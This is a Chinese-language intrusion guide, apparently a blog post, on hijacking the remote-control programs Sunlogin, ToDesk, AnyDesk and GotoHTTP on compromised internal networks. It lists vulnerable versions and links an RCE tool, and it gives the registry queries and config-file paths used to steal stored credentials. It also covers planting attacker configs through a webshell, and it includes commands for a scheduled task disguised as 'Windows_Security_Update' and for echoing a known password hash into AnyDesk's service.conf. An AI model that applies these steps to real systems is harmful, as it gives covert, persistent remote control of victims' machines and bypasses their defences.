内网远程控制总结
字数 1693 2025-08-06 12:21:02

内网远程控制软件渗透技术总结

前言

在内网渗透过程中,远程控制软件是常见的攻击目标。本文总结了针对向日葵、ToDesk、AnyDesk和GotoHTTP等远程控制软件的渗透技术,包括漏洞利用、配置窃取和绕过防御等方法。

向日葵远程控制软件渗透

向日葵版本查看

在渗透前需要先确认目标向日葵版本,判断是否存在可利用漏洞。

可攻击版本利用

受影响版本

  • 向日葵个人版for Windows ≤ 11.0.0.33
  • 向日葵简约版 ≤ V1.0.1.43315(2021.12)
  • 测试客户端漏洞版本: 11.0.0.33162

攻击步骤

  1. 检查Sunlogin进程是否存在:tasklist
  2. 使用Golang工具进行攻击:https://github.com/Mr-xn/sunlogin_rce

不可攻击版本渗透方法

1. 窃取配置文件解密(低版本)

配置文件路径

  • 安装版:C:\Program Files\Oray\SunLogin\SunloginClient\config.ini
  • 便携版:C:\ProgramData\Oray\SunloginClient\config.ini

关键参数

  • encry_pwd:本机验证码
  • fastcode:本机识别码(去掉开头字母)
  • sunlogincode:判断用户是否登录状态

利用方法
将配置文件下载到攻击机,重新开启向日葵即可使用窃取的凭证。

2. 注册表查询(12.5.2之前版本)

查询注册表获取凭证信息:

reg query HKEY_USERS\.DEFAULT\Software\Oray\SunLogin\SunloginClient\SunloginInfo
reg query HKEY_USERS\.DEFAULT\Software\Oray\SunLogin\SunloginClient\SunloginGreenInfo

注意:向日葵高于12.5.3.*的版本已无法通过此方法获取secret。

ToDesk远程控制软件渗透

常见渗透方式(配置文件窃取)

配置文件路径C:\Program Files\ToDesk\config.ini

攻击步骤

  1. 攻击机安装ToDesk
  2. 读取目标机的config.ini文件
  3. 将目标机的tempauthpassex值替换到攻击机的配置文件中
  4. 修改攻击机密码更新频率
  5. 两机密码将变为相同

AnyDesk远程控制软件渗透

情景复现1:绕过Windows Defender

前提条件

  • 已获取受害机普通权限webshell
  • 受害机开启Windows Defender

攻击步骤

  1. 攻击机准备

    • 下载并安装AnyDesk
    • 清除旧配置:删除C:\Users\用户名\AppData\Roaming\AnyDesk中的文件
    • 打开AnyDesk,记录ID
    • 设置自主访问密码(示例:Q16G666!!)
    • 完全退出AnyDesk(包括托盘图标)
    • 复制生成的四个配置文件并删除原文件

  2. 受害机操作

    • 通过webshell下载AnyDesk到用户目录
    • 创建配置文件路径:C:\Users\用户名\AppData\Roaming\AnyDesk
    • 将攻击机的四个配置文件复制到此目录

  3. 连接控制

    • 攻击机重新打开AnyDesk
    • 受害机运行AnyDesk
    • 攻击机使用记录的ID和设置的密码连接

情景复现2:计划任务执行

适用场景:命令行无法直接执行时

攻击步骤

  1. 确定当前用户:
powershell "(((Get-WmiObject -Class Win32_Process -Filter 'Name=\"explorer.exe\"').GetOwner().user) -split '\n')[0]"
  1. 创建计划任务:
schtasks /Create /TN Windows_Security_Update /SC monthly /tr "C:\Users\testuser.G1TS\Desktop\anydesk.exe" /RU 用户名
  1. 执行计划任务:
schtasks /run /tn Windows_Security_Update
  1. 添加密码哈希到配置文件:
echo ad.anynet.pwd_hash=85352d14ed8d515103f6af88dd68db7573a37ae0f9c9d2952c3a63a8220a501c >> C:\Users\用户目录\AppData\Roaming\AnyDesk\service.conf
echo ad.anynet.pwd_salt=cb65156829a1d5a7281bfe8f6c98734a >> C:\Users\用户目录\AppData\Roaming\AnyDesk\service.conf
  1. 查看用户ID:
type C:\Users\用户名\AppData\Roaming\AnyDesk\system.conf

AnyDesk渗透优缺点

优点

  • 整个过程无需UAC弹窗,实现无感绕过

缺点

  1. 会弹出AnyDesk界面
  2. 需要桌面用户权限启动,IIS等中间件获取的webshell通常无法成功启动

GotoHTTP渗透

特点:浏览器连接,方便快捷,但权限划分明确

复现过程

  1. 下载GotoHTTP:https://gotohttp.com/
  2. 上传到目标机并运行
  3. 在当前目录生成配置文件
  4. 读取配置文件获取连接信息

限制:普通用户权限启动的GotoHTTP无法进行管理员操作(如关闭Windows Defender)

参考资源

  1. https://blog.csdn.net/weixin_44216796/article/details/112118108
  2. https://github.com/Mr-xn/sunlogin_rce
内网远程控制软件渗透技术总结 前言 在内网渗透过程中,远程控制软件是常见的攻击目标。本文总结了针对向日葵、ToDesk、AnyDesk和GotoHTTP等远程控制软件的渗透技术,包括漏洞利用、配置窃取和绕过防御等方法。 向日葵远程控制软件渗透 向日葵版本查看 在渗透前需要先确认目标向日葵版本,判断是否存在可利用漏洞。 可攻击版本利用 受影响版本 : 向日葵个人版for Windows ≤ 11.0.0.33 向日葵简约版 ≤ V1.0.1.43315(2021.12) 测试客户端漏洞版本: 11.0.0.33162 攻击步骤 : 检查Sunlogin进程是否存在: tasklist 使用Golang工具进行攻击:https://github.com/Mr-xn/sunlogin_ rce 不可攻击版本渗透方法 1. 窃取配置文件解密(低版本) 配置文件路径 : 安装版: C:\Program Files\Oray\SunLogin\SunloginClient\config.ini 便携版: C:\ProgramData\Oray\SunloginClient\config.ini 关键参数 : encry_pwd :本机验证码 fastcode :本机识别码(去掉开头字母) sunlogincode :判断用户是否登录状态 利用方法 : 将配置文件下载到攻击机,重新开启向日葵即可使用窃取的凭证。 2. 注册表查询(12.5.2之前版本) 查询注册表获取凭证信息: 注意 :向日葵高于12.5.3.* 的版本已无法通过此方法获取secret。 ToDesk远程控制软件渗透 常见渗透方式(配置文件窃取) 配置文件路径 : C:\Program Files\ToDesk\config.ini 攻击步骤 : 攻击机安装ToDesk 读取目标机的config.ini文件 将目标机的 tempauthpassex 值替换到攻击机的配置文件中 修改攻击机密码更新频率 两机密码将变为相同 AnyDesk远程控制软件渗透 情景复现1:绕过Windows Defender 前提条件 : 已获取受害机普通权限webshell 受害机开启Windows Defender 攻击步骤 : 攻击机准备 : 下载并安装AnyDesk 清除旧配置:删除 C:\Users\用户名\AppData\Roaming\AnyDesk 中的文件 打开AnyDesk,记录ID 设置自主访问密码(示例:Q16G666! !) 完全退出AnyDesk(包括托盘图标) 复制生成的四个配置文件并删除原文件 受害机操作 : 通过webshell下载AnyDesk到用户目录 创建配置文件路径: C:\Users\用户名\AppData\Roaming\AnyDesk 将攻击机的四个配置文件复制到此目录 连接控制 : 攻击机重新打开AnyDesk 受害机运行AnyDesk 攻击机使用记录的ID和设置的密码连接 情景复现2:计划任务执行 适用场景 :命令行无法直接执行时 攻击步骤 : 确定当前用户: 创建计划任务: 执行计划任务: 添加密码哈希到配置文件: 查看用户ID: AnyDesk渗透优缺点 优点 : 整个过程无需UAC弹窗,实现无感绕过 缺点 : 会弹出AnyDesk界面 需要桌面用户权限启动,IIS等中间件获取的webshell通常无法成功启动 GotoHTTP渗透 特点 :浏览器连接,方便快捷,但权限划分明确 复现过程 : 下载GotoHTTP:https://gotohttp.com/ 上传到目标机并运行 在当前目录生成配置文件 读取配置文件获取连接信息 限制 :普通用户权限启动的GotoHTTP无法进行管理员操作(如关闭Windows Defender) 参考资源 https://blog.csdn.net/weixin_ 44216796/article/details/112118108 https://github.com/Mr-xn/sunlogin_ rce